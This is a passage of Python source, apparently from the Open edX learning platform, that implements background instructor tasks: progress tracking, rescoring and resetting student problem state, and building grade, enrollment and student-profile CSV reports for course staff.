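#   @task(base=BaseInstructorTask)
#   def example_instructor_task(entry_id, xmodule_instance_args):
#       return run_main_task(entry_id, some_task_fcn, 'processed')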
class UpdateProblemModuleStateError(Exception):
"""
Error signaling a fatal condition while updating problem modules.
Used when the current module cannot be processed and no more
modules should be attempted.
"""
pass
def _get_current_task():
"""
Stub to make it easier to test without actually running Celery.
This is a wrapper around celery.current_task, which provides access
to the top of the stack of Celery's tasks. When running tests, however,
it doesn't seem to work to mock current_task directly, so this wrapper
is used to provide a hook to mock in tests, while providing the real
`current_task` in production.
"""
return current_task
class TaskProgress(object):
"""
Encapsulates the current task's progress by keeping track of
'attempted', 'succeeded', 'skipped', 'failed', 'total',
'action_name', and 'duration_ms' values.
"""
def __init__(self, action_name, total, start_time):
self.action_name = action_name
self.total = total
self.start_time = start_time
self.attempted = 0
self.succeeded = 0
self.skipped = 0
self.failed = 0
def update_task_state(self, extra_meta=None):
"""
Update the current celery task's state to the progress state
specified by the current object. Returns the progress
dictionary for use by `run_main_task` and
`BaseInstructorTask.on_success`.
Arguments:
extra_meta (dict): Extra metadata to pass to `update_state`
Returns:
dict: The current task's progress dict
"""
progress_dict = {
'action_name': self.action_name,
'attempted': self.attempted,
'succeeded': self.succeeded,
'skipped': self.skipped,
'failed': self.failed,
'total': self.total,
'duration_ms': int((time() - self.start_time) * 1000),
}
if extra_meta is not None:
progress_dict.update(extra_meta)
_get_current_task().update_state(state=PROGRESS, meta=progress_dict)
return progress_dict
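# Hedged usage sketch (mirrors how perform_module_state_update below uses the
# class; nothing new is added): a task function creates one TaskProgress up front,
# bumps the counters as it iterates, and reports state when it finishes.
#
#   progress = TaskProgress(action_name, modules_to_update.count(), time())
#   for module in modules_to_update:
#       progress.attempted += 1
#       ...
#       progress.succeeded += 1
#   return progress.update_task_state()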
def run_main_task(entry_id, task_fcn, action_name):
"""
Applies the `task_fcn` to the arguments defined in `entry_id` InstructorTask.
Arguments passed to `task_fcn` are:
`entry_id` : the primary key for the InstructorTask entry representing the task.
`course_id` : the id for the course.
`task_input` : dict containing task-specific arguments, JSON-decoded from InstructorTask's task_input.
`action_name` : past-tense verb to use for constructing status messages.
If no exceptions are raised, the `task_fcn` should return a dict containing
the task's result with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible subtasks to attempt
'action_name': user-visible verb to use in status messages.
Should be past-tense. Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
"""
# Get the InstructorTask to be updated. If this fails then let the exception return to Celery.
# There's no point in catching it here.
with outer_atomic():
entry = InstructorTask.objects.get(pk=entry_id)
entry.task_state = PROGRESS
entry.save_now()
# Get inputs to use in this task from the entry
task_id = entry.task_id
course_id = entry.course_id
task_input = json.loads(entry.task_input)
# Construct log message
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(task_id=task_id, entry_id=entry_id, course_id=course_id, task_input=task_input)
TASK_LOG.info(u'%s, Starting update (nothing %s yet)', task_info_string, action_name)
# Check that the task_id submitted in the InstructorTask matches the current task
# that is running.
request_task_id = _get_current_task().request.id
if task_id != request_task_id:
fmt = u'{task_info}, Requested task did not match actual task "{actual_id}"'
message = fmt.format(task_info=task_info_string, actual_id=request_task_id)
TASK_LOG.error(message)
raise ValueError(message)
# Now do the work
with dog_stats_api.timer('instructor_tasks.time.overall', tags=[u'action:{name}'.format(name=action_name)]):
task_progress = task_fcn(entry_id, course_id, task_input, action_name)
# Release any queries that the connection has been hanging onto
reset_queries()
# Log and exit, returning task_progress info as task result
TASK_LOG.info(u'%s, Task type: %s, Finishing task: %s', task_info_string, action_name, task_progress)
return task_progress
def perform_module_state_update(update_fcn, filter_fcn, _entry_id, course_id, task_input, action_name):
"""
Performs generic update by visiting StudentModule instances with the update_fcn provided.
StudentModule instances are those that match the specified `course_id` and `module_state_key`.
If `student_identifier` is not None, it is used as an additional filter to limit the modules to those belonging
to that student. If `student_identifier` is None, performs update on modules for all students on the specified problem.
If a `filter_fcn` is not None, it is applied to the query that has been constructed. It takes one
argument, which is the query being filtered, and returns the filtered version of the query.
The `update_fcn` is called on each StudentModule that passes the resulting filtering.
It is passed three arguments: the module_descriptor for the module pointed to by the
module_state_key, the particular StudentModule to update, and the xmodule_instance_args being
passed through. If the value returned by the update function evaluates to a boolean True,
the update is successful; False indicates the update on the particular student module failed.
A raised exception indicates a fatal condition -- that no other student modules should be considered.
The return value is a dict containing the task's results, with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible updates to attempt
'action_name': user-visible verb to use in status messages. Should be past-tense.
Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
Because this is run internal to a task, it does not catch exceptions. These are allowed to pass up to the
next level, so that it can set the failure modes and capture the error trace in the InstructorTask and the
result object.
"""
start_time = time()
usage_keys = []
problem_url = task_input.get('problem_url')
entrance_exam_url = task_input.get('entrance_exam_url')
student_identifier = task_input.get('student')
problems = {}
# if problem_url is present make a usage key from it
if problem_url:
usage_key = course_id.make_usage_key_from_deprecated_string(problem_url)
usage_keys.append(usage_key)
# find the problem descriptor:
problem_descriptor = modulestore().get_item(usage_key)
problems[unicode(usage_key)] = problem_descriptor
# if entrance_exam is present grab all problems in it
if entrance_exam_url:
problems = get_problems_in_section(entrance_exam_url)
usage_keys = [UsageKey.from_string(location) for location in problems.keys()]
# find the modules in question
modules_to_update = StudentModule.objects.filter(course_id=course_id, module_state_key__in=usage_keys)
# give the option of updating an individual student. If not specified,
# then updates all students who have responded to a problem so far
student = None
if student_identifier is not None:
# if an identifier is supplied, then look for the student,
# and let it throw an exception if none is found.
if "@" in student_identifier:
student = User.objects.get(email=student_identifier)
else:
student = User.objects.get(username=student_identifier)
if student is not None:
modules_to_update = modules_to_update.filter(student_id=student.id)
if filter_fcn is not None:
modules_to_update = filter_fcn(modules_to_update)
task_progress = TaskProgress(action_name, modules_to_update.count(), start_time)
task_progress.update_task_state()
for module_to_update in modules_to_update:
task_progress.attempted += 1
module_descriptor = problems[unicode(module_to_update.module_state_key)]
# There is no try here: if there's an error, we let it throw, and the task will
# be marked as FAILED, with a stack trace.
with dog_stats_api.timer('instructor_tasks.module.time.step', tags=[u'action:{name}'.format(name=action_name)]):
update_status = update_fcn(module_descriptor, module_to_update)
if update_status == UPDATE_STATUS_SUCCEEDED:
# If the update_fcn returns true, then it performed some kind of work.
# Logging of failures is left to the update_fcn itself.
task_progress.succeeded += 1
elif update_status == UPDATE_STATUS_FAILED:
task_progress.failed += 1
elif update_status == UPDATE_STATUS_SKIPPED:
task_progress.skipped += 1
else:
raise UpdateProblemModuleStateError("Unexpected update_status returned: {}".format(update_status))
return task_progress.update_task_state()
def _get_task_id_from_xmodule_args(xmodule_instance_args):
"""Gets task_id from `xmodule_instance_args` dict, or returns default value if missing."""
return xmodule_instance_args.get('task_id', UNKNOWN_TASK_ID) if xmodule_instance_args is not None else UNKNOWN_TASK_ID
def _get_xqueue_callback_url_prefix(xmodule_instance_args):
"""Gets prefix to use when constructing xqueue_callback_url."""
return xmodule_instance_args.get('xqueue_callback_url_prefix', '') if xmodule_instance_args is not None else ''
def _get_track_function_for_task(student, xmodule_instance_args=None, source_page='x_module_task'):
"""
Make a tracking function that logs what happened.
For insertion into ModuleSystem, and used by CapaModule, which will
provide the event_type (as string) and event (as dict) as arguments.
The request_info and task_info (and page) are provided here.
"""
# get request-related tracking information from args passthrough, and supplement with task-specific
# information:
request_info = xmodule_instance_args.get('request_info', {}) if xmodule_instance_args is not None else {}
task_info = {'student': student.username, 'task_id': _get_task_id_from_xmodule_args(xmodule_instance_args)}
return lambda event_type, event: task_track(request_info, task_info, event_type, event, page=source_page)
def _get_module_instance_for_task(course_id, student, module_descriptor, xmodule_instance_args=None,
grade_bucket_type=None, course=None):
"""
Fetches a StudentModule instance for a given `course_id`, `student` object, and `module_descriptor`.
`xmodule_instance_args` is used to provide information for creating a track function and an XQueue callback.
These are passed, along with `grade_bucket_type`, to get_module_for_descriptor_internal, which sidesteps
the need for a Request object when instantiating an xmodule instance.
"""
# reconstitute the problem's corresponding XModule:
field_data_cache = FieldDataCache.cache_for_descriptor_descendents(course_id, student, module_descriptor)
student_data = KvsFieldData(DjangoKeyValueStore(field_data_cache))
# get request-related tracking information from args passthrough, and supplement with task-specific
# information:
request_info = xmodule_instance_args.get('request_info', {}) if xmodule_instance_args is not None else {}
task_info = {"student": student.username, "task_id": _get_task_id_from_xmodule_args(xmodule_instance_args)}
def make_track_function():
'''
Make a tracking function that logs what happened.
For insertion into ModuleSystem, and used by CapaModule, which will
provide the event_type (as string) and event (as dict) as arguments.
The request_info and task_info (and page) are provided here.
'''
return lambda event_type, event: task_track(request_info, task_info, event_type, event, page='x_module_task')
xqueue_callback_url_prefix = xmodule_instance_args.get('xqueue_callback_url_prefix', '') \
if xmodule_instance_args is not None else ''
return get_module_for_descriptor_internal(
user=student,
descriptor=module_descriptor,
student_data=student_data,
course_id=course_id,
track_function=make_track_function(),
xqueue_callback_url_prefix=xqueue_callback_url_prefix,
grade_bucket_type=grade_bucket_type,
# This module isn't being used for front-end rendering
request_token=None,
# pass in a loaded course for override enabling
course=course
)
@outer_atomic
def rescore_problem_module_state(xmodule_instance_args, module_descriptor, student_module):
'''
Takes an XModule descriptor and a corresponding StudentModule object, and
performs rescoring on the student's problem submission.
Throws exceptions if the rescoring failure is fatal and any enclosing loop should be aborted.
In particular, raises UpdateProblemModuleStateError if the module fails to instantiate,
or if the module doesn't support rescoring.
Returns UPDATE_STATUS_SUCCEEDED if the problem was successfully rescored for the given student, and
UPDATE_STATUS_FAILED if rescoring encountered some kind of error.
'''
# unpack the StudentModule:
course_id = student_module.course_id
student = student_module.student
usage_key = student_module.module_state_key
with modulestore().bulk_operations(course_id):
course = get_course_by_id(course_id)
# TODO: Here is a call site where we could pass in a loaded course. I
# think we certainly need it since grading is happening here, and field
# overrides would be important in handling that correctly
instance = _get_module_instance_for_task(
course_id,
student,
module_descriptor,
xmodule_instance_args,
grade_bucket_type='rescore',
course=course
)
if instance is None:
# Either permissions just changed, or someone is trying to be clever
# and load something they shouldn't have access to.
msg = "No module {loc} for student {student}--access denied?".format(
loc=usage_key,
student=student
)
TASK_LOG.debug(msg)
raise UpdateProblemModuleStateError(msg)
if not hasattr(instance, 'rescore_problem'):
# This should also not happen, since it should already have been checked in the caller,
# but check here to be sure.
msg = "Specified problem does not support rescoring."
raise UpdateProblemModuleStateError(msg)
result = instance.rescore_problem()
instance.save()
if 'success' not in result:
# don't consider these fatal, but a failed status means that the individual call didn't complete:
TASK_LOG.warning(
u"error processing rescore call for course %(course)s, problem %(loc)s "
u"and student %(student)s: unexpected response %(msg)s",
dict(
msg=result,
course=course_id,
loc=usage_key,
student=student
)
)
return UPDATE_STATUS_FAILED
elif result['success'] not in ['correct', 'incorrect']:
TASK_LOG.warning(
u"error processing rescore call for course %(course)s, problem %(loc)s "
u"and student %(student)s: %(msg)s",
dict(
msg=result['success'],
course=course_id,
loc=usage_key,
student=student
)
)
return UPDATE_STATUS_FAILED
else:
TASK_LOG.debug(
u"successfully processed rescore call for course %(course)s, problem %(loc)s "
u"and student %(student)s: %(msg)s",
dict(
msg=result['success'],
course=course_id,
loc=usage_key,
student=student
)
)
return UPDATE_STATUS_SUCCEEDED
@outer_atomic
def reset_attempts_module_state(xmodule_instance_args, _module_descriptor, student_module):
"""
Resets problem attempts to zero for specified `student_module`.
Returns a status of UPDATE_STATUS_SUCCEEDED if a problem has non-zero attempts
that are being reset, and UPDATE_STATUS_SKIPPED otherwise.
"""
update_status = UPDATE_STATUS_SKIPPED
problem_state = json.loads(student_module.state) if student_module.state else {}
if 'attempts' in problem_state:
old_number_of_attempts = problem_state["attempts"]
if old_number_of_attempts > 0:
problem_state["attempts"] = 0
# convert back to json and save
student_module.state = json.dumps(problem_state)
student_module.save()
# get request-related tracking information from args passthrough,
# and supplement with task-specific information:
track_function = _get_track_function_for_task(student_module.student, xmodule_instance_args)
event_info = {"old_attempts": old_number_of_attempts, "new_attempts": 0}
track_function('problem_reset_attempts', event_info)
update_status = UPDATE_STATUS_SUCCEEDED
return update_status
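# A minimal sketch of the state round-trip above, assuming a hypothetical stored state:
#
#     state = json.loads('{"attempts": 3, "seed": 1}')
#     state["attempts"] = 0
#     json.dumps(state)   # -> '{"attempts": 0, "seed": 1}'
#
# Only the "attempts" field is touched; any other fields (like the made-up "seed")
# pass through unchanged.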
@outer_atomic
def delete_problem_module_state(xmodule_instance_args, _module_descriptor, student_module):
"""
Delete the StudentModule entry.
Always returns UPDATE_STATUS_SUCCEEDED, unless a database error causes an exception to be raised.
"""
student_module.delete()
# get request-related tracking information from args passthrough,
# and supplement with task-specific information:
track_function = _get_track_function_for_task(student_module.student, xmodule_instance_args)
track_function('problem_delete_state', {})
return UPDATE_STATUS_SUCCEEDED
def upload_csv_to_report_store(rows, csv_name, course_id, timestamp, config_name='GRADES_DOWNLOAD'):
"""
Upload data as a CSV using ReportStore.
Arguments:
rows: CSV data in the following format (the first row may be a
header):
[
[row1_column1, row1_column2, ...],
...
]
csv_name: Name of the resulting CSV
course_id: ID of the course
"""
report_store = ReportStore.from_config(config_name)
report_store.store_rows(
course_id,
u"{course_prefix}_{csv_name}_{timestamp_str}.csv".format(
course_prefix=course_filename_prefix_generator(course_id),
csv_name=csv_name,
timestamp_str=timestamp.strftime("%Y-%m-%d-%H%M")
),
rows
)
tracker.emit(REPORT_REQUESTED_EVENT_NAME, {"report_type": csv_name, })
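# A minimal usage sketch, assuming hypothetical column names and values; only the shape
# of `rows` (a list of row lists, optionally starting with a header row) matters:
#
#     rows = [
#         ['id', 'username', 'grade'],
#         [42, 'student_a', 0.85],
#     ]
#     upload_csv_to_report_store(rows, 'example_report', course_id, datetime.now(UTC))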
def upload_exec_summary_to_store(data_dict, report_name, course_id, generated_at, config_name='FINANCIAL_REPORTS'):
"""
Upload an executive summary HTML file using ReportStore.
Arguments:
data_dict: dict containing the executive report data.
report_name: Name of the resulting HTML file.
course_id: ID of the course
"""
report_store = ReportStore.from_config(config_name)
# Use the data dict and html template to generate the output buffer
output_buffer = StringIO(render_to_string("instructor/instructor_dashboard_2/executive_summary.html", data_dict))
report_store.store(
course_id,
u"{course_prefix}_{report_name}_{timestamp_str}.html".format(
course_prefix=course_filename_prefix_generator(course_id),
report_name=report_name,
timestamp_str=generated_at.strftime("%Y-%m-%d-%H%M")
),
output_buffer,
)
tracker.emit(REPORT_REQUESTED_EVENT_NAME, {"report_type": report_name})
def upload_grades_csv(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name): # pylint: disable=too-many-statements
"""
For a given `course_id`, generate a grades CSV file for all students that
are enrolled, and store using a `ReportStore`. Once created, the files can
be accessed by instantiating another `ReportStore` (via
`ReportStore.from_config()`) and calling `link_for()` on it. Writes are
buffered, so we'll never write part of a CSV file to S3 -- i.e. any files
that are visible in ReportStore will be complete ones.
As we start to add more CSV downloads, it will probably be worthwhile to
make a more general CSVDoc class instead of building out the rows like we
do here.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
course = get_course_by_id(course_id)
course_is_cohorted = is_course_cohorted(course.id)
teams_enabled = course.teams_enabled
cohorts_header = ['Cohort Name'] if course_is_cohorted else []
teams_header = ['Team Name'] if teams_enabled else []
experiment_partitions = get_split_user_partitions(course.user_partitions)
group_configs_header = [u'Experiment Group ({})'.format(partition.name) for partition in experiment_partitions]
certificate_info_header = ['Certificate Eligible', 'Certificate Delivered', 'Certificate Type']
certificate_whitelist = CertificateWhitelist.objects.filter(course_id=course_id, whitelist=True)
whitelisted_user_ids = [entry.user_id for entry in certificate_whitelist]
# Loop over all our students and build our CSV lists in memory
header = None
rows = []
err_rows = [["id", "username", "error_msg"]]
current_step = {'step': 'Calculating Grades'}
total_enrolled_students = enrolled_students.count()
student_counter = 0
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Starting grade calculation for total students: %s',
task_info_string,
action_name,
current_step,
total_enrolled_students
)
for student, gradeset, err_msg in iterate_grades_for(course_id, enrolled_students):
# Periodically update task status (this is a cache write)
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
task_progress.attempted += 1
# Now add a log entry after each student is graded to get a sense
# of the task's progress
student_counter += 1
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Grade calculation in-progress for students: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_enrolled_students
)
if gradeset:
# We were able to successfully grade this student for this course.
task_progress.succeeded += 1
if not header:
header = [section['label'] for section in gradeset[u'section_breakdown']]
rows.append(
["id", "email", "username", "grade"] + header + cohorts_header +
group_configs_header + teams_header +
['Enrollment Track', 'Verification Status'] + certificate_info_header
)
percents = {
section['label']: section.get('percent', 0.0)
for section in gradeset[u'section_breakdown']
if 'label' in section
}
cohorts_group_name = []
if course_is_cohorted:
group = get_cohort(student, course_id, assign=False)
cohorts_group_name.append(group.name if group else '')
group_configs_group_names = []
for partition in experiment_partitions:
group = LmsPartitionService(student, course_id).get_group(partition, assign=False)
group_configs_group_names.append(group.name if group else '')
team_name = []
if teams_enabled:
try:
membership = CourseTeamMembership.objects.get(user=student, team__course_id=course_id)
team_name.append(membership.team.name)
except CourseTeamMembership.DoesNotExist:
team_name.append('')
enrollment_mode = CourseEnrollment.enrollment_mode_for_user(student, course_id)[0]
verification_status = SoftwareSecurePhotoVerification.verification_status_for_user(
student,
course_id,
enrollment_mode
)
certificate_info = certificate_info_for_user(
student,
course_id,
gradeset['grade'],
student.id in whitelisted_user_ids
)
# Not everybody has the same gradable items. If the item is not
# found in the user's gradeset, just assume it's a 0. The aggregated
# grades for their sections and overall course will be calculated
# without regard for the item they didn't have access to, so it's
# possible for a student to have a 0.0 show up in their row but
# still have 100% for the course.
row_percents = [percents.get(label, 0.0) for label in header]
rows.append(
[student.id, student.email, student.username, gradeset['percent']] +
row_percents + cohorts_group_name + group_configs_group_names + team_name +
[enrollment_mode] + [verification_status] + certificate_info
)
else:
# An empty gradeset means we failed to grade a student.
task_progress.failed += 1
err_rows.append([student.id, student.username, err_msg])
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Grade calculation completed for students: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_enrolled_students
)
# By this point, we've got the rows we're going to stuff into our CSV files.
current_step = {'step': 'Uploading CSVs'}
task_progress.update_task_state(extra_meta=current_step)
TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
# Perform the actual upload
upload_csv_to_report_store(rows, 'grade_report', course_id, start_date)
# If there are any error rows (don't count the header), write them out as well
if len(err_rows) > 1:
upload_csv_to_report_store(err_rows, 'grade_report_err', course_id, start_date)
# One last update before we close out...
TASK_LOG.info(u'%s, Task type: %s, Finalizing grade task', task_info_string, action_name)
return task_progress.update_task_state(extra_meta=current_step)
def _order_problems(blocks):
"""
Sort the problems by the assignment type and the assignment they belong to.
Args:
blocks (OrderedDict) - A course structure containing blocks that have been ordered
(i.e. when we iterate over them, we will see them in the order
that they appear in the course).
Returns:
an OrderedDict that maps a problem id to its headers in the final report.
"""
problems = OrderedDict()
assignments = OrderedDict()
# First, sort out all the blocks into their correct assignments and all the
# assignments into their correct types.
for block in blocks:
# Put the assignments in order into the assignments list.
if blocks[block]['block_type'] == 'sequential':
block_format = blocks[block]['format']
if block_format not in assignments:
assignments[block_format] = OrderedDict()
assignments[block_format][block] = list()
# Put the problems into the correct order within their assignment.
if blocks[block]['block_type'] == 'problem' and blocks[block]['graded'] is True:
current = blocks[block]['parent']
# crawl up the tree for the sequential block
while blocks[current]['block_type'] != 'sequential':
current = blocks[current]['parent']
current_format = blocks[current]['format']
assignments[current_format][current].append(block)
# Now that we have a sorting and an order for the assignments and problems,
# iterate through them in order to generate the header row.
for assignment_type in assignments:
for assignment_index, assignment in enumerate(assignments[assignment_type].keys(), start=1):
for problem in assignments[assignment_type][assignment]:
header_name = u"{assignment_type} {assignment_index}: {assignment_name} - {block}".format(
block=blocks[problem]['display_name'],
assignment_type=assignment_type,
assignment_index=assignment_index,
assignment_name=blocks[assignment]['display_name']
)
problems[problem] = [header_name + " (Earned)", header_name + " (Possible)"]
return problems
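# A minimal sketch of the expected input/output, using invented block ids and names:
#
#     blocks = OrderedDict([
#         ('seq1', {'block_type': 'sequential', 'format': 'Homework',
#                   'display_name': 'HW 1', 'parent': 'chapter1'}),
#         ('prob1', {'block_type': 'problem', 'graded': True, 'parent': 'seq1',
#                    'display_name': 'Problem A'}),
#     ])
#     _order_problems(blocks)
#     # -> {'prob1': ['Homework 1: HW 1 - Problem A (Earned)',
#     #               'Homework 1: HW 1 - Problem A (Possible)']}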
def upload_problem_responses_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing
all student answers to a given problem, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Calculating students answers to problem'}
task_progress.update_task_state(extra_meta=current_step)
# Compute result table and format it
problem_location = task_input.get('problem_location')
student_data = list_problem_responses(course_id, problem_location)
features = ['username', 'state']
header, rows = format_dictlist(student_data, features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
problem_location = re.sub(r'[:/]', '_', problem_location)
csv_name = 'student_state_from_{}'.format(problem_location)
upload_csv_to_report_store(rows, csv_name, course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def upload_problem_grade_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
Generate a CSV containing all students' problem grades within a given
`course_id`.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
# This dict maps the django User field names used for the static columns (as keys) to
# the display names shown in the header row (as values). It is structured this way to
# keep the two related.
header_row = OrderedDict([('id', 'Student ID'), ('email', 'Email'), ('username', 'Username')])
try:
course_structure = CourseStructure.objects.get(course_id=course_id)
blocks = course_structure.ordered_blocks
problems = _order_problems(blocks)
except CourseStructure.DoesNotExist:
return task_progress.update_task_state(
extra_meta={'step': 'Generating course structure. Please refresh and try again.'}
)
# Just generate the static fields for now.
rows = [list(header_row.values()) + ['Final Grade'] + list(chain.from_iterable(problems.values()))]
error_rows = [list(header_row.values()) + ['error_msg']]
current_step = {'step': 'Calculating Grades'}
for student, gradeset, err_msg in iterate_grades_for(course_id, enrolled_students, keep_raw_scores=True):
student_fields = [getattr(student, field_name) for field_name in header_row]
task_progress.attempted += 1
if 'percent' not in gradeset or 'raw_scores' not in gradeset:
# There was an error grading this student.
# Generally there will be a non-empty err_msg, but that is not always the case.
if not err_msg:
err_msg = u"Unknown error"
error_rows.append(student_fields + [err_msg])
task_progress.failed += 1
continue
final_grade = gradeset['percent']
# Only consider graded problems
problem_scores = {unicode(score.module_id): score for score in gradeset['raw_scores'] if score.graded}
earned_possible_values = list()
for problem_id in problems:
try:
problem_score = problem_scores[problem_id]
earned_possible_values.append([problem_score.earned, problem_score.possible])
except KeyError:
# The student has not been graded on this problem. For example,
# iterate_grades_for skips problems that students have never
# seen in order to speed up report generation. It could also be
# the case that the student does not have access to it (e.g. A/B
# test or cohorted courseware).
earned_possible_values.append(['N/A', 'N/A'])
rows.append(student_fields + [final_grade] + list(chain.from_iterable(earned_possible_values)))
task_progress.succeeded += 1
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload if any students have been successfully graded
if len(rows) > 1:
upload_csv_to_report_store(rows, 'problem_grade_report', course_id, start_date)
# If there are any error rows, write them out as well
if len(error_rows) > 1:
upload_csv_to_report_store(error_rows, 'problem_grade_report_err', course_id, start_date)
return task_progress.update_task_state(extra_meta={'step': 'Uploading CSV'})
def upload_students_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing profile
information for all students that are enrolled, and store using a
`ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
current_step = {'step': 'Calculating Profile Info'}
task_progress.update_task_state(extra_meta=current_step)
# compute the student features table and format it
query_features = task_input
student_data = enrolled_students_features(course_id, query_features)
header, rows = format_dictlist(student_data, query_features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(rows, 'student_profile_info', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def upload_enrollment_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing profile
information for all students that are enrolled, and store using a
`ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
students_in_course = CourseEnrollment.objects.enrolled_and_dropped_out_users(course_id)
task_progress = TaskProgress(action_name, students_in_course.count(), start_time)
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
# Loop over all our students and build our CSV lists in memory
rows = []
header = None
current_step = {'step': 'Gathering Profile Information'}
enrollment_report_provider = PaidCourseEnrollmentReportProvider()
total_students = students_in_course.count()
student_counter = 0
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, generating detailed enrollment report for total students: %s',
task_info_string,
action_name,
current_step,
total_students
)
for student in students_in_course:
# Periodically update task status (this is a cache write)
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
task_progress.attempted += 1
# Now add a log entry after certain intervals to get a hint that the task is in progress
student_counter += 1
if student_counter % 100 == 0:
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, gathering enrollment profile for students in progress: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_students
)
user_data = enrollment_report_provider.get_user_profile(student.id)
course_enrollment_data = enrollment_report_provider.get_enrollment_info(student, course_id)
payment_data = enrollment_report_provider.get_payment_info(student, course_id)
# display name map for the column headers
enrollment_report_headers = {
'User ID': _('User ID'),
'Username': _('Username'),
'Full Name': _('Full Name'),
'First Name': _('First Name'),
'Last Name': _('Last Name'),
'Company Name': _('Company Name'),
'Title': _('Title'),
'Language': _('Language'),
'Year of Birth': _('Year of Birth'),
'Gender': _('Gender'),
'Level of Education': _('Level of Education'),
'Mailing Address': _('Mailing Address'),
'Goals': _('Goals'),
'City': _('City'),
'Country': _('Country'),
'Enrollment Date': _('Enrollment Date'),
'Currently Enrolled': _('Currently Enrolled'),
'Enrollment Source': _('Enrollment Source'),
'Manual (Un)Enrollment Reason': _('Manual (Un)Enrollment Reason'),
'Enrollment Role': _('Enrollment Role'),
'List Price': _('List Price'),
'Payment Amount': _('Payment Amount'),
'Coupon Codes Used': _('Coupon Codes Used'),
'Registration Code Used': _('Registration Code Used'),
'Payment Status': _('Payment Status'),
'Transaction Reference Number': _('Transaction Reference Number')
}
if not header:
header = user_data.keys() + course_enrollment_data.keys() + payment_data.keys()
display_headers = []
for header_element in header:
# translate header into a localizable display string
display_headers.append(enrollment_report_headers.get(header_element, header_element))
rows.append(display_headers)
rows.append(user_data.values() + course_enrollment_data.values() + payment_data.values())
task_progress.succeeded += 1
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Detailed enrollment report generated for students: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_students
)
# By this point, we've got the rows we're going to stuff into our CSV files.
current_step = {'step': 'Uploading CSVs'}
task_progress.update_task_state(extra_meta=current_step)
TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
# Perform the actual upload
upload_csv_to_report_store(rows, 'enrollment_report', course_id, start_date, config_name='FINANCIAL_REPORTS')
# One last update before we close out...
TASK_LOG.info(u'%s, Task type: %s, Finalizing detailed enrollment task', task_info_string, action_name)
return task_progress.update_task_state(extra_meta=current_step)
def upload_may_enroll_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing
information about students who may enroll but have not done so
yet, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Calculating info about students who may enroll'}
task_progress.update_task_state(extra_meta=current_step)
# Compute result table and format it
query_features = task_input.get('features')
student_data = list_may_enroll(course_id, query_features)
header, rows = format_dictlist(student_data, query_features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
